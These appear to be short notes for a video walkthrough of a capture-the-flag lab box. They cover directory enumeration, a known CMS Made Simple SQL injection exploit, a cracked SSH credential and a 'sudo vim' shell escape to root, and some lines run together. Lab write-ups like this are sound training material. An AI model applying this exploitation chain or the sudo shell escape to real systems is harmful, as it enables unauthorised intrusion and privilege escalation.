Resources for this video:
dirsearch - https://github.com/maurosoria/dirsearch
Exploit-DB for Simple CMS - https://www.exploit-db.com/exploits/46635
Not FTP, not normal SSH, nothing directly under the first page
dirbuster?
/simple/ contains CMS Made Simple
Google:
has exploit. Exploit gives us a user and hash. Find has password:
CMS Made Simple < 2.2.10 - SQL Injection - PHP webapps Exploit (exploit-db.com) MD5 hash for « 0c01f4468bd75d7a84c7eb73846e8d96 » (gromweb.com)
secretaccount:
mitch:secretconnect to SSH on port 2222:
ssh -p 2222 mitch@10.10.14.50User Enum:
whoami
sudo -lWe have sudo for VIM
GTFOBins:
sudo vim -c ':!/bin/bash'find both files and cat them out:
locate user.txt
locate root.txt